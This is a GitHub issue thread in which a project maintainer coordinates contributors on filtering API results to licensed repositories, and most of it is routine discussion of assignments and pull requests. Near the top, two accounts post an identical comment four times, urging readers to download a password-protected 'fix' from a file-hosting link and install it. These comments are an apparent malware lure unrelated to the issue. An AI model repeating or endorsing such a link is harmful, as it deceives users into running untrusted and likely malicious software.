### ISSUE TITLE
Update the github API query to only fetch LICENSED open source projects

### ISSUE THREAD

**Issue by dotslashbit** [The-Enthusiast-404/git-begin#47]
update the github query to only fetch issues from those repositories that have a LICENSE.

Just comment below before working on it, and if you need any help ping me I'll help you to solve this, lets do this together

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Vishnu-0609** [comment]
hello sir,i would like to solve this problem can you help me about this problem i'll give my best.

**Comment by dotslashbit** [comment]
Sure, let's do this. Do one thing, start working on this issue and if there's any doubt you have, then just ping me. 

Do you know how to create a PR? 

There's no rush please take your time, I'll assign this to you.

If you have never contributed then I would suggest you to watch a yr video on this.

**Comment by ST-KO** [comment]
Hi there, can I still contribute to this issue?

**Comment by dotslashbit** [comment]
@ST-KO I would say just wait for 24 hours and if @Vishnu-0609 didn't respond then I'll assign it to you, how about that?

**Comment by dotslashbit** [comment]
@Vishnu-0609 Please let me know if you'll work on this or not by tomorrow? Thanks

**Comment by ST-KO** [comment]
@dotslashbit No worries. That sounds fair. I'll wait. Thanks for keeping me in the loop.

**Comment by dotslashbit** [comment]
> @dotslashbit No worries. That sounds fair. I'll wait. Thanks for keeping me in the loop.

Awesome, thanks for your patience. Let me know if you want to work on adding tests, it'll be a high impact contribution

**Comment by dotslashbit** [comment]
@ST-KO I have a issue for you, its an important issue, here's the issue --> #35

**Comment by ST-KO** [comment]
> @ST-KO I have a issue for you, its an important issue, here's the issue --> #35

Sure, I'll take a look at #35 and can also contribute with testing as well. I'll start working on it first thing tomorrow since its midnight here.

**Comment by sanketmn26** [comment]
@dotslashbit Created a pull request. Please check if this is the solution you wanted.

**Comment by sanketmn26** [comment]
> @ST-KO I would say just wait for 24 hours and if @Vishnu-0609 didn't respond then I'll assign it to you, how about that?

Should I close my PR right now or should wait for @Vishnu-0609 response.

**Comment by dotslashbit** [comment]
Yeah you can wait. Thank you for understanding the situation

**Comment by dotslashbit** [comment]
@sanketmn26 what happened, why did you closed the PR?

**Comment by dotslashbit** [comment]
@sanketmn26 got it, one more thing just give a screen recording by clicking on any of the issue and then go to the repo and show the the license exist. 

I hope you get that, if not then let me know, thanks

**Comment by sanketmn26** [comment]
> @sanketmn26 got it, one more thing just give a screen recording by clicking on any of the issue and then go to the repo and show the the license exist.

Working as you said above.

But when I try to filter by category, it is showing this error. Showing in my local setup. Please check.

![Screenshot (230)](https://github.com/user-attachments/assets/315f9161-5e6c-4610-9c05-b25c77b1a925)

**Comment by dotslashbit** [comment]
@sanketmn26 Just checked yes you are right. Let me know if you can work on it, else I would have to work on it. Don't need to rush it but just asking you if you can

**Comment by sanketmn26** [comment]
@dotslashbit let me try if I can fix it.

**Comment by dotslashbit** [comment]
@sanketmn26 sure go ahead

**Comment by sanketmn26** [comment]
@dotslashbit raised a PR #56. I hope my solution addresses your problem. Thanks for cooperation.
